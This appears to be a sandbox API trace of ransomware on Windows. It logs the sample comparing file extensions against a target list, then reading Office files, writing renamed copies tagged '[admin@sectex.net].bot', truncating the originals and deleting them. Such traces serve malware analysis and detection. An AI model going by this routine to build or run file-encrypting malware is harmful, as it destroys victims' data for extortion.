	[0143.520] lstrlenW (lpString=".jpg") returned 4
	[0143.520] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0143.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD") returned 57
	[0143.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD") returned 57
	[0143.521] lstrlenW (lpString=".doc") returned 4
	[0143.521] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0143.521] lstrlenW (lpString=".docx") returned 5
	[0143.521] lstrcmpiW (lpString1=".docx", lpString2="T.VRD") returned -1
	[0143.521] lstrlenW (lpString=".pdf") returned 4
	[0143.521] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0143.521] lstrlenW (lpString=".xls") returned 4
	[0143.521] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0143.521] lstrlenW (lpString=".xlsx") returned 5
	[0143.521] lstrcmpiW (lpString1=".xlsx", lpString2="T.VRD") returned -1
	[0143.521] lstrlenW (lpString=".ppt") returned 4
	[0143.521] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0143.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD") returned 57
	[0143.521] lstrlenW (lpString=".zip") returned 4
	[0143.521] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0143.521] lstrlenW (lpString=".rar") returned 4
	[0143.521] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0143.521] lstrlenW (lpString=".bz2") returned 4
	[0143.521] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0143.521] lstrlenW (lpString=".7z") returned 3
	[0143.521] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0143.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD") returned 57
	[0143.521] lstrlenW (lpString=".dbf") returned 4
	[0143.521] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0143.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD") returned 57
	[0143.521] lstrlenW (lpString=".1cd") returned 4
	[0143.521] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0143.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD") returned 57
	[0143.521] lstrlenW (lpString=".jpg") returned 4
	[0143.521] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0143.521] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0143.522] lstrlenW (lpString="BCSRuntimeRes.dll") returned 17
	[0143.522] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bcsruntimeres.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0143.523] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=24960) returned 1
	[0143.523] CloseHandle (hObject=0x2a0) returned 1
	[0143.523] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bcsruntimeres.dll")) returned 0x20
	[0143.523] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bcsruntimeres.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.523] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bcsruntimeres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0143.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll") returned 65
	[0143.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll") returned 65
	[0143.523] lstrlenW (lpString=".doc") returned 4
	[0143.523] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0143.523] lstrlenW (lpString=".docx") returned 5
	[0143.523] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1
	[0143.523] lstrlenW (lpString=".pdf") returned 4
	[0143.523] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0143.523] lstrlenW (lpString=".xls") returned 4
	[0143.523] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0143.523] lstrlenW (lpString=".xlsx") returned 5
	[0143.523] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1
	[0143.523] lstrlenW (lpString=".ppt") returned 4
	[0143.523] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0143.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll") returned 65
	[0143.524] lstrlenW (lpString=".zip") returned 4
	[0143.524] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0143.524] lstrlenW (lpString=".rar") returned 4
	[0143.524] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0143.524] lstrlenW (lpString=".bz2") returned 4
	[0143.524] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0143.524] lstrlenW (lpString=".7z") returned 3
	[0143.524] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0143.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll") returned 65
	[0143.524] lstrlenW (lpString=".dbf") returned 4
	[0143.524] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0143.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll") returned 65
	[0143.524] lstrlenW (lpString=".1cd") returned 4
	[0143.524] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0143.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll") returned 65
	[0143.524] lstrlenW (lpString=".jpg") returned 4
	[0143.524] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0143.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll") returned 65
	[0143.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll") returned 65
	[0143.524] lstrlenW (lpString=".doc") returned 4
	[0143.524] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0143.524] lstrlenW (lpString=".docx") returned 5
	[0143.524] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1
	[0143.524] lstrlenW (lpString=".pdf") returned 4
	[0143.524] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0143.524] lstrlenW (lpString=".xls") returned 4
	[0143.524] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0143.524] lstrlenW (lpString=".xlsx") returned 5
	[0143.524] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1
	[0143.524] lstrlenW (lpString=".ppt") returned 4
	[0143.524] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0143.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll") returned 65
	[0143.524] lstrlenW (lpString=".zip") returned 4
	[0143.525] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0143.525] lstrlenW (lpString=".rar") returned 4
	[0143.525] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0143.525] lstrlenW (lpString=".bz2") returned 4
	[0143.525] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0143.525] lstrlenW (lpString=".7z") returned 3
	[0143.525] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0143.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll") returned 65
	[0143.525] lstrlenW (lpString=".dbf") returned 4
	[0143.525] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0143.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll") returned 65
	[0143.525] lstrlenW (lpString=".1cd") returned 4
	[0143.525] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0143.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll") returned 65
	[0143.525] lstrlenW (lpString=".jpg") returned 4
	[0143.525] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0143.525] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0143.525] lstrlenW (lpString="BHOINTL.DLL") returned 11
	[0143.525] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bhointl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0143.528] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=10104) returned 1
	[0143.528] CloseHandle (hObject=0x2a0) returned 1
	[0143.528] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bhointl.dll")) returned 0x20
	[0143.528] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bhointl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.528] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bhointl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0143.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned 59
	[0143.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned 59
	[0143.529] lstrlenW (lpString=".doc") returned 4
	[0143.529] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0143.529] lstrlenW (lpString=".docx") returned 5
	[0143.529] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0143.529] lstrlenW (lpString=".pdf") returned 4
	[0143.529] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0143.529] lstrlenW (lpString=".xls") returned 4
	[0143.529] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0143.529] lstrlenW (lpString=".xlsx") returned 5
	[0143.529] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0143.529] lstrlenW (lpString=".ppt") returned 4
	[0143.529] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0143.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned 59
	[0143.529] lstrlenW (lpString=".zip") returned 4
	[0143.529] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0143.529] lstrlenW (lpString=".rar") returned 4
	[0143.529] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0143.529] lstrlenW (lpString=".bz2") returned 4
	[0143.529] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0143.529] lstrlenW (lpString=".7z") returned 3
	[0143.529] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0143.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned 59
	[0143.529] lstrlenW (lpString=".dbf") returned 4
	[0143.529] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0143.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned 59
	[0143.529] lstrlenW (lpString=".1cd") returned 4
	[0143.529] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0143.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned 59
	[0143.529] lstrlenW (lpString=".jpg") returned 4
	[0143.529] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0143.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned 59
	[0143.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned 59
	[0143.530] lstrlenW (lpString=".doc") returned 4
	[0143.530] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0143.530] lstrlenW (lpString=".docx") returned 5
	[0143.530] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0143.530] lstrlenW (lpString=".pdf") returned 4
	[0143.530] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0143.530] lstrlenW (lpString=".xls") returned 4
	[0143.530] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0143.530] lstrlenW (lpString=".xlsx") returned 5
	[0143.530] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0143.530] lstrlenW (lpString=".ppt") returned 4
	[0143.530] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0143.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned 59
	[0143.530] lstrlenW (lpString=".zip") returned 4
	[0143.530] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0143.530] lstrlenW (lpString=".rar") returned 4
	[0143.530] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0143.530] lstrlenW (lpString=".bz2") returned 4
	[0143.530] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0143.530] lstrlenW (lpString=".7z") returned 3
	[0143.530] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0143.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned 59
	[0143.530] lstrlenW (lpString=".dbf") returned 4
	[0143.530] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0143.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned 59
	[0143.530] lstrlenW (lpString=".1cd") returned 4
	[0143.530] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0143.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned 59
	[0143.530] lstrlenW (lpString=".jpg") returned 4
	[0143.530] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0143.531] lstrcmpiW (lpString1=".VSL", lpString2=".bot") returned 1
	[0143.531] lstrlenW (lpString="BSTORM.VSL") returned 10
	[0143.531] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bstorm.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0143.532] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=45968) returned 1
	[0143.532] CloseHandle (hObject=0x2a0) returned 1
	[0143.532] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bstorm.vsl")) returned 0x20
	[0143.532] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bstorm.vsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bstorm.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0143.532] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.532] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bstorm.vsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0143.533] GetLastError () returned 0x0
	[0143.533] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xb390, lpOverlapped=0x0) returned 1
	[0143.769] WriteFile (in: hFile=0x38c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xb3a0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xb3a0, lpOverlapped=0x0) returned 1
	[0143.777] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.777] WriteFile (in: hFile=0x38c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0143.777] SetEndOfFile (hFile=0x38c) returned 1
	[0143.791] CloseHandle (hObject=0x38c) returned 1
	[0143.791] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.791] SetEndOfFile (hFile=0x2a0) returned 1
	[0143.794] CloseHandle (hObject=0x2a0) returned 1
	[0143.794] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.806] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bstorm.vsl")) returned 1
	[0143.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL") returned 58
	[0143.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL") returned 58
	[0143.809] lstrlenW (lpString=".doc") returned 4
	[0143.809] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0143.809] lstrlenW (lpString=".docx") returned 5
	[0143.809] lstrcmpiW (lpString1=".docx", lpString2="M.VSL") returned -1
	[0143.809] lstrlenW (lpString=".pdf") returned 4
	[0143.809] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0143.809] lstrlenW (lpString=".xls") returned 4
	[0143.810] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0143.810] lstrlenW (lpString=".xlsx") returned 5
	[0143.810] lstrcmpiW (lpString1=".xlsx", lpString2="M.VSL") returned -1
	[0143.810] lstrlenW (lpString=".ppt") returned 4
	[0143.810] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0143.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL") returned 58
	[0143.810] lstrlenW (lpString=".zip") returned 4
	[0143.810] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0143.810] lstrlenW (lpString=".rar") returned 4
	[0143.810] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0143.810] lstrlenW (lpString=".bz2") returned 4
	[0143.810] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0143.810] lstrlenW (lpString=".7z") returned 3
	[0143.810] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0143.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL") returned 58
	[0143.810] lstrlenW (lpString=".dbf") returned 4
	[0143.810] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0143.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL") returned 58
	[0143.810] lstrlenW (lpString=".1cd") returned 4
	[0143.810] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0143.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL") returned 58
	[0143.810] lstrlenW (lpString=".jpg") returned 4
	[0143.810] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0143.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL") returned 58
	[0143.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL") returned 58
	[0143.810] lstrlenW (lpString=".doc") returned 4
	[0143.810] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0143.810] lstrlenW (lpString=".docx") returned 5
	[0143.810] lstrcmpiW (lpString1=".docx", lpString2="M.VSL") returned -1
	[0143.810] lstrlenW (lpString=".pdf") returned 4
	[0143.810] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0143.810] lstrlenW (lpString=".xls") returned 4
	[0143.811] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0143.811] lstrlenW (lpString=".xlsx") returned 5
	[0143.811] lstrcmpiW (lpString1=".xlsx", lpString2="M.VSL") returned -1
	[0143.811] lstrlenW (lpString=".ppt") returned 4
	[0143.811] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0143.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL") returned 58
	[0143.811] lstrlenW (lpString=".zip") returned 4
	[0143.811] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0143.811] lstrlenW (lpString=".rar") returned 4
	[0143.811] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0143.811] lstrlenW (lpString=".bz2") returned 4
	[0143.811] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0143.811] lstrlenW (lpString=".7z") returned 3
	[0143.811] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0143.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL") returned 58
	[0143.811] lstrlenW (lpString=".dbf") returned 4
	[0143.811] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0143.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL") returned 58
	[0143.811] lstrlenW (lpString=".1cd") returned 4
	[0143.811] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0143.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL") returned 58
	[0143.811] lstrlenW (lpString=".jpg") returned 4
	[0143.811] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0143.811] lstrcmpiW (lpString1=".VSL", lpString2=".bot") returned 1
	[0143.811] lstrlenW (lpString="DBENGR.VSL") returned 10
	[0143.811] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbengr.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0144.295] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=53144) returned 1
	[0144.295] CloseHandle (hObject=0x3cc) returned 1
	[0144.295] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbengr.vsl")) returned 0x20
	[0144.332] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbengr.vsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbengr.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0144.499] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.499] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.499] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbengr.vsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0144.522] GetLastError () returned 0x0
	[0144.522] ReadFile (in: hFile=0x3b4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xcf98, lpOverlapped=0x0) returned 1
	[0144.525] WriteFile (in: hFile=0x2a0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xcfa0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xcfa0, lpOverlapped=0x0) returned 1
	[0144.527] ReadFile (in: hFile=0x3b4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.527] WriteFile (in: hFile=0x2a0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0144.527] SetEndOfFile (hFile=0x2a0) returned 1
	[0144.527] CloseHandle (hObject=0x2a0) returned 1
	[0144.527] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.527] SetEndOfFile (hFile=0x3b4) returned 1
	[0144.530] CloseHandle (hObject=0x3b4) returned 1
